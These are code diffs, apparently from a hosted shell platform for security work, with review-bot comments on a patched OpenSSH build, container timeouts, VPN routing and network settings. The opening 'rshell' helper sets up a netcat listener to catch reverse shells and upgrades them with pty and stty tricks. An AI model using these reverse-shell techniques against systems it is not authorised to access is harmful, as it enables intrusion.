export SHELL=/bin/bash
|
||||
export TERM=xterm-256color
|
||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||
|| exec script -qc bash /dev/null
|
||||
export SHELL=/bin/bash TERM=xterm-256color
|
||||
reset -I
|
||||
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
||||
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
||||
${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
|
||||
-----------------------------------"
|
||||
${CN}${CF}-------------------------------------------------------------------------------${CN}
|
||||
To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
|
||||
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
||||
|
||||
cfg=$(stty --save)
|
||||
stty raw -echo opost
|
||||
time nc -vnlp "$rport"
|
||||
echo "Restoring TTY"
|
||||
echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
|
||||
nc -nlp "$rport"
|
||||
echo "🦋 Restoring terminal..."
|
||||
stty "$cfg"
|
||||
# reset -I
|
||||
|
||||
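Review bot: `stty raw -echo opost` puts the user's terminal into raw mode and only the `stty "$cfg"` after `nc -nlp "$rport"` restores it, so if the script is interrupted before nc returns (SIGHUP or SIGTERM, or the documented `kill "$(pgrep -P $$)"` landing on the wrong process) the terminal stays raw; registering `trap 'stty "$cfg"' EXIT` right after `cfg=$(stty --save)` covers that. The printed instruction `cut & paste the following into the _this_ shell` has a stray article and should read `into _this_ shell`. The commented-out `# reset -I` after the restore is dead code and can go. Outside the change itself, the context line `load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found..."` reuses the port message for the IP file; `"No reverse IP found..."` would tell the two failures apart.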
|
|
|
@ -1,29 +1,34 @@
|
|||
|
||||
VER=9.6p1
|
||||
|
||||
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
||||
docker build --no-cache --network host -t sf-host .
|
||||
|
||||
albuild:
|
||||
bash -c "docker run --rm alpine-gcc true || \
|
||||
docker commit alpine-gcc alpine-gcc || { \
|
||||
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||
&& docker commit alpine-gcc alpine-gcc; }"
|
||||
bash -c "docker run --rm sf-alpine-gcc true || \
|
||||
docker commit sf-alpine-gcc sf-alpine-gcc || { \
|
||||
docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||
&& docker commit sf-alpine-gcc sf-alpine-gcc; }"
|
||||
|
||||
# See mk_sshd.sh for manual debugging
|
||||
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
|
||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
|
||||
fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
|
||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
|
||||
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
|
||||
|
||||
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||
@echo SUCCESS
|
||||
|
||||
fs-root/bin/unix-socket-client: unix-socket-client.c
|
||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||
@echo SUCCESS
|
||||
|
||||
diff:
|
||||
cd dev && \
|
||||
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
|
||||
diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
|
||||
@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
|
||||
|
||||
clean:
|
||||
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
|
||||
docker image rm alpine-gcc
|
||||
rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
|
||||
docker image rm sf-alpine-gcc
|
||||
|
||||
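Review bot: `fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh` lists `albuild` as a normal prerequisite, but `albuild` is a command target that never produces a file of that name, so make treats it as remade on every run and rebuilds sshd (a full OpenSSH build inside docker) on every `make`, even when the patch and script are unchanged. Making it order-only, `fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh | albuild`, keeps the image-exists guarantee without the timestamp, and `.PHONY: all albuild diff clean` should be declared so a stray file with one of those names cannot disable the target. `fs-root/bin/docker-exec-sigproxy` and `fs-root/bin/unix-socket-client` also run inside `sf-alpine-gcc` but do not list `albuild`, so under `make -j` or when built directly on a fresh checkout they fail before the image exists; the same order-only prerequisite applies there. `VER=9.6p1` is recursively expanded; `VER := 9.6p1` is the conventional form for a fixed value.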
|
|
|
@ -424,7 +424,7 @@ print_goodbye()
|
|||
|
||||
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
||||
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
||||
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||
n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||
[[ -z "$n" ]] && n=0
|
||||
[[ ${#n} -gt 5 ]] && n=0
|
||||
[[ ! $n -eq $n ]] && n=0
|
||||
|
@ -435,7 +435,7 @@ print_goodbye()
|
|||
str="process is"
|
||||
[[ "$n" -gt 1 ]] && str="processes are"
|
||||
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
||||
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||
exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||
echo -e "\
|
||||
-------> The encrypted filesystem in /sec will remain accessible until
|
||||
-------> the last shell exits or all background processes terminate.
|
||||
|
@ -443,16 +443,6 @@ print_goodbye()
|
|||
-------> This will also make /sec unavailabe until your next log in."
|
||||
fi
|
||||
echo -en "\r"
|
||||
[[ -z $SF_IS_PAYING ]] && {
|
||||
echo -e "\
|
||||
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
|
||||
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
|
||||
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
|
||||
|
||||
}
|
||||
|
||||
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
||||
|
||||
echo -e "\
|
||||
|
@ -536,7 +526,7 @@ spawn_shell_exit()
|
|||
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
||||
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
||||
# Request a reverse Port Forward
|
||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||
|
||||
|
||||
# Warn user if this is the last server by IP (after semaphore has been released)
|
||||
|
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
|
|||
# Setup container (within container's namespace)
|
||||
unset WGNAME_UP
|
||||
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
||||
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||
exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
||||
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
||||
|
||||
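Review bot: `timeout 5 docker exec ... /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."` now folds two different failures into one message: a setup script that exits non-zero and one that merely exceeded 5 s (`timeout` exits 124, and the process inside the container is not necessarily killed when the client is). Capturing the status, `rc=$?`, and including it in the STOPEXIT text (with `rc=124` reported as "timed out") lets the logs distinguish a slow host from a broken setup, assuming `exec_devnull` preserves the exit status. The pgrep counts guarded with `timeout 2` in the first two hunks degrade to `n=0` on timeout, so a slow docker daemon prints the "no processes running" goodbye even when processes exist; acceptable for a best-effort message, but worth a comment on the `[[ -z "$n" ]] && n=0` line. `print_goodbye` and `spawn_shell_exit` start outside the hunks.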
|
|
|
@ -11,11 +11,17 @@
|
|||
DSTDIR="/src/fs-root/usr/sbin"
|
||||
DSTBIN="${DSTDIR}/sshd"
|
||||
set -e
|
||||
SRCDIR="/tmp/openssh-9.2p1"
|
||||
SRCDIR="/src/dev/openssh-${VER:?}-sf"
|
||||
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
|
||||
cd /src/dev
|
||||
[[ ! -d "$SRCDIR" ]] && {
|
||||
# Cloudflare to often returns 503 - "BLOCKED"
|
||||
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||
wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
|
||||
tar xfz "openssh-${VER}.tar.gz"
|
||||
mv "openssh-${VER}" "openssh-${VER}-orig"
|
||||
tar xfz "openssh-${VER}.tar.gz"
|
||||
mv "openssh-${VER}" "${SRCDIR}"
|
||||
|
||||
cd "$SRCDIR"
|
||||
|
||||
|
@ -39,5 +45,5 @@ strip sshd
|
|||
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
||||
cp sshd "${DSTBIN}"
|
||||
chmod 755 "${DSTBIN}"
|
||||
rm -rf "${SRCDIR:?}"
|
||||
# rm -rf "${SRCDIR:?}"
|
||||
|
||||
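Review bot: `wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"` pulls the sshd sources that end up on every host from a third-party mirror with no integrity check, so a tampered mirror becomes a tampered sshd; verify the detached PGP signature OpenSSH publishes next to each release (`openssh-${VER}.tar.gz.asc` against the OpenSSH release key), or at minimum compare against a pinned digest, `echo "<PINNED_SHA256>  openssh-${VER}.tar.gz" | sha256sum -c -`, before the first `tar xfz`. Because the download has no `-O`, a re-run in an existing `/src/dev` (after `make clean`, which removes the directories but not the archive) saves to `openssh-${VER}.tar.gz.1` and `tar` silently unpacks the older file; `wget -O "openssh-${VER}.tar.gz"` avoids that. The second `tar xfz` could be `cp -a "openssh-${VER}-orig" "${SRCDIR}"` to avoid unpacking twice, though that is only a nicety.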
|
|
|
@ -1,7 +1,7 @@
|
|||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
|
||||
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05
|
||||
@@ -3639,7 +3639,7 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
|
||||
--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
|
||||
@@ -3683,7 +3683,7 @@
|
||||
ssh->chanctxt->IPv4or6 = af;
|
||||
}
|
||||
|
||||
|
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||
/*
|
||||
* Determine whether or not a port forward listens to loopback, the
|
||||
* specified address or wildcard. On the client, a specified bind
|
||||
@@ -3677,6 +3677,7 @@
|
||||
@@ -3721,6 +3721,7 @@
|
||||
* address and it was overridden.
|
||||
*/
|
||||
if (*listen_addr != '\0' &&
|
||||
|
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
||||
strcmp(listen_addr, "*") != 0) {
|
||||
ssh_packet_send_debug(ssh,
|
||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
|
||||
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17
|
||||
@@ -102,6 +102,12 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
|
||||
--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
|
||||
@@ -101,6 +101,12 @@
|
||||
/* requested tunnel forwarding interface(s), shared with session.c */
|
||||
char *tun_fwd_ifnames = NULL;
|
||||
|
||||
|
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
/* returns 1 if bind to specified port by specified user is permitted */
|
||||
static int
|
||||
bind_permitted(int port, uid_t uid)
|
||||
@@ -391,8 +397,10 @@
|
||||
@@ -388,8 +394,10 @@
|
||||
/* Clean up sessions, utmp, etc. */
|
||||
cleanup_exit(255);
|
||||
}
|
||||
|
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
if (conn_in_ready &&
|
||||
process_input(ssh, connection_in) < 0)
|
||||
break;
|
||||
@@ -637,12 +645,14 @@
|
||||
@@ -634,12 +642,14 @@
|
||||
|
||||
if (strcmp(ctype, "session") == 0) {
|
||||
c = server_request_session(ssh);
|
||||
|
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
}
|
||||
if (c != NULL) {
|
||||
debug_f("confirm %s", ctype);
|
||||
@@ -802,8 +812,20 @@
|
||||
@@ -799,8 +809,20 @@
|
||||
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
||||
} else {
|
||||
/* Start listening on the port */
|
||||
|
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
}
|
||||
if ((resp = sshbuf_new()) == NULL)
|
||||
fatal_f("sshbuf_new");
|
||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
|
||||
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05
|
||||
@@ -536,8 +536,71 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
|
||||
--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
|
||||
@@ -531,8 +531,71 @@
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
|
|||
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
||||
{
|
||||
#ifdef DISABLE_FD_PASSING
|
||||
@@ -576,8 +639,34 @@
|
||||
@@ -571,8 +634,34 @@
|
||||
|
||||
reseed_prngs();
|
||||
|
||||
@ -47,6 +47,23 @@ Sanitize()
|
|||
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
||||
}
|
||||
|
||||
InitColors() {
|
||||
# COLOR is set (to 'always')
|
||||
Y=$CDY
|
||||
C=$CDC
|
||||
R=$CDR
|
||||
RR=$CR
|
||||
G=$CDG
|
||||
B=$CB
|
||||
M=$CDM
|
||||
YY=$CY
|
||||
W=$CW
|
||||
N=$CN
|
||||
F=$CF
|
||||
ICON_ERROR="💥 "
|
||||
ICON_WARN="💥 "
|
||||
}
|
||||
|
||||
GetFormVars()
|
||||
{
|
||||
local IFS
|
||||
|
@ -71,7 +88,6 @@ GetFormVars()
|
|||
[[ ${key} == "config" ]] && {
|
||||
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
||||
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
||||
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||
}
|
||||
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
||||
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
||||
|
@ -128,6 +144,9 @@ GetFormVars()
|
|||
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
||||
}
|
||||
done
|
||||
|
||||
[[ -n $COLOR ]] && InitColors
|
||||
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||
}
|
||||
|
||||
# Load PID of WireGuard container
|
||||
|
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
|
|||
|
||||
# The PortD add's a /sf/run/self/reverse_forward.
|
||||
echo -en "\
|
||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
|
||||
${M}🤭 Tip${N}: Type ${C}rshell${N}
|
||||
${G}👾 New reverse Port is ${Y}${ipport}${CN}"
|
||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
|
||||
${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
|
||||
${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
|
||||
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
|
||||
|
||||
# portd.sh automaticaly adds this to /config/self/reverse_*
|
||||
exit
|
||||
|
@ -807,22 +827,7 @@ cmd_wg_show()
|
|||
0<&- # Close STDIN
|
||||
Sanitize
|
||||
GetFormVars
|
||||
[[ -n $COLOR ]] && {
|
||||
# COLOR is set (to 'always')
|
||||
Y=$CDY
|
||||
C=$CDC
|
||||
R=$CDR
|
||||
RR=$CR
|
||||
G=$CDG
|
||||
B=$CB
|
||||
M=$CDM
|
||||
YY=$CY
|
||||
W=$CW
|
||||
N=$CN
|
||||
F=$CF
|
||||
ICON_ERROR="💥 "
|
||||
ICON_WARN="💥 "
|
||||
}
|
||||
|
||||
|
||||
|
||||
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
||||
|
@ -836,13 +841,13 @@ GetFormVars
|
|||
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
||||
[[ -n $SF_OVPN_HACK ]] && {
|
||||
wg_net_init
|
||||
[[ ${ARGS[1]} == 'vpn' ]] && {
|
||||
source "/sf/bin/funcs_vpn.sh"
|
||||
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up
|
||||
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show
|
||||
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del
|
||||
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
|
||||
cmd_vpn_help
|
||||
[[ ${ARGS[1]} == 'ovpn' ]] && {
|
||||
source "/sf/bin/funcs_ovpn.sh"
|
||||
[[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
|
||||
[[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
|
||||
[[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
|
||||
[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
|
||||
cmd_ovpn_help
|
||||
exit
|
||||
}
|
||||
}
|
||||
|
@ -869,14 +874,14 @@ wg_net_init
|
|||
exit
|
||||
}
|
||||
|
||||
[[ "${FCGI_CMD}" == "vpn" ]] && {
|
||||
source "/sf/bin/funcs_vpn.sh"
|
||||
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up
|
||||
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show
|
||||
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del
|
||||
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
|
||||
[[ "${FCGI_CMD}" == "ovpn" ]] && {
|
||||
source "/sf/bin/funcs_ovpn.sh"
|
||||
[[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
|
||||
[[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
|
||||
[[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
|
||||
[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
|
||||
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
||||
cmd_vpn_help
|
||||
cmd_ovpn_help
|
||||
|
||||
exit
|
||||
}
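Review bot: The rename drops the `vpn` route with no fallback: both the `[[ ${ARGS[1]} == 'ovpn' ]]` test in the SF_OVPN_HACK block and the `[[ "${FCGI_CMD}" == "ovpn" ]]` test in the dispatcher now match only the new name, while the comment just above the hack block still says the feature is "served via curl sf/vpn/*" and the help text in funcs_ovpn.sh still tells users to run `curl sf/vpn/up`. Unless nginx rewrites `/vpn/` to `/ovpn/` somewhere outside this commit, a client following the printed instructions no longer reaches any of these handlers. Keep the old name as an alias for a release: `[[ ${ARGS[1]} == 'vpn' || ${ARGS[1]} == 'ovpn' ]] && {` in the hack block, `[[ "${FCGI_CMD}" == "vpn" || "${FCGI_CMD}" == "ovpn" ]] && {` in the dispatcher, and fix the comment to `(it's now served via curl sf/ovpn/*)`. The dispatcher's surrounding code starts before these hunks.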
|
||||
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
|
|||
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
||||
|
||||
# Create 'empty' for ZSH's prompt to show WG EXIT
|
||||
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||
# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
|
||||
:>"${LID_PROMPT_FN}"
|
||||
|
||||
set -e
|
||||
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
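Review bot: The commented-out `# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"` line left above the new `:>"${LID_PROMPT_FN}"` is dead code; the comment beneath it already explains the overwrite, so drop the stale line rather than keep both. Note also that the truncation runs before `set -e`, so if `/dev/shm/sf/self-for-guest/lg-${LID}/` does not exist the redirection fails silently and the script carries on — if that is intended, say so in the comment: `# Overwrite existing (runs before set -e: a missing lg-dir is not fatal here). Re-created by sf-setup.sh if WG-NET is still up.` The script continues beyond this hunk.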
|
||||
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
|
|||
SF_MULLVAD_ROUTE=10.124.0.0/22
|
||||
SF_NOVPN_IP=172.20.0.240
|
||||
SF_NGINX_IP=172.20.1.80
|
||||
SF_RPC_IP=10.11.0.2
|
||||
SF_RPC_IP=100.126.224.2
|
||||
SF_GSNC_IP=172.22.0.21
|
||||
SF_SSHD_IP=172.22.0.22
|
||||
SF_DOH_IP=172.23.0.2
|
||||
|
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
|
|||
SF_NET_VPN=172.20.0.0/24
|
||||
SF_NET_VPN_DNS_IP=172.20.0.53
|
||||
|
||||
SF_NET_LG=10.11.0.0/24
|
||||
SF_NET_LG_ROUTER_IP=10.11.0.1
|
||||
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
|
||||
SF_NET_LG=100.126.224.0/22
|
||||
SF_NET_LG_ROUTER_IP=100.126.224.1
|
||||
SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
|
||||
|
||||
SF_NET_VPN_ROUTER_IP=172.20.0.2
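Review bot: The new guest addressing (`SF_NET_LG=100.126.224.0/22`, `SF_RPC_IP=100.126.224.2`, router `100.126.224.1`, dummy `100.126.227.254`) lies in the RFC 6598 shared address space (100.64.0.0/10), and nothing in the file records why it replaced `10.11.0.0/24`; add a comment above `SF_NET_LG` such as `# 100.64.0.0/10 (RFC 6598 / CGNAT) — chosen so guest addressing cannot collide with RFC 1918 ranges a user's VPN or WireGuard exit may push`. Presumably that collision is the motivation, but a user whose upstream ISP or VPN itself hands out CGNAT addresses will now have that traffic shadowed by the guest LAN, which belongs in the same comment. Any firewall rule or nginx allow-list keyed on `10.11.0.0/24` outside this commit needs the same update — I cannot see those from here.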
|
||||
|
||||
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
|
|||
CG="\e[1;32m" # green
|
||||
CR="\e[1;31m" # red
|
||||
CC="\e[1;36m" # cyan
|
||||
# CM="\e[1;35m" # magenta
|
||||
CM="\e[1;35m" # magenta
|
||||
CW="\e[1;37m" # white
|
||||
CB="\e[1;34m" # blue
|
||||
CF="\e[2m" # faint
|
||||
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
|
|||
_sf_basedir="/sf"
|
||||
_sf_dbdir="${_sf_basedir}/config/db"
|
||||
unset _sf_isinit
|
||||
_sf_region="$(hostname)"
|
||||
|
||||
_sf_deinit()
|
||||
{
|
||||
|
@ -507,27 +508,29 @@ lgrm()
|
|||
lgban()
|
||||
{
|
||||
local fn
|
||||
local hn
|
||||
local ip
|
||||
local msg
|
||||
local lid
|
||||
local lglid="${1}"
|
||||
|
||||
_sf_init
|
||||
lid="${1}"
|
||||
shift 1
|
||||
|
||||
fn="${_self_for_guest_dir}/${lid}/ip"
|
||||
fn="${_self_for_guest_dir}/${lglid}/ip"
|
||||
[[ -f "$fn" ]] && {
|
||||
ip=$(<"$fn")
|
||||
fn="${_self_for_guest_dir}/${lglid}/hostname"
|
||||
[[ -f "${fn}" ]] && hn=$(<"${fn}")
|
||||
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
||||
[[ ! -e "$fn" ]] && {
|
||||
[[ $# -gt 0 ]] && msg="$*\n"
|
||||
echo -en "$msg" >"${fn}"
|
||||
echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
|
||||
}
|
||||
echo "Banned: $ip"
|
||||
}
|
||||
|
||||
lgstop "${lid}" "$@"
|
||||
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||
lgstop "${lglid}" "$@"
|
||||
#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||
|
||||
_sf_deinit
|
||||
}
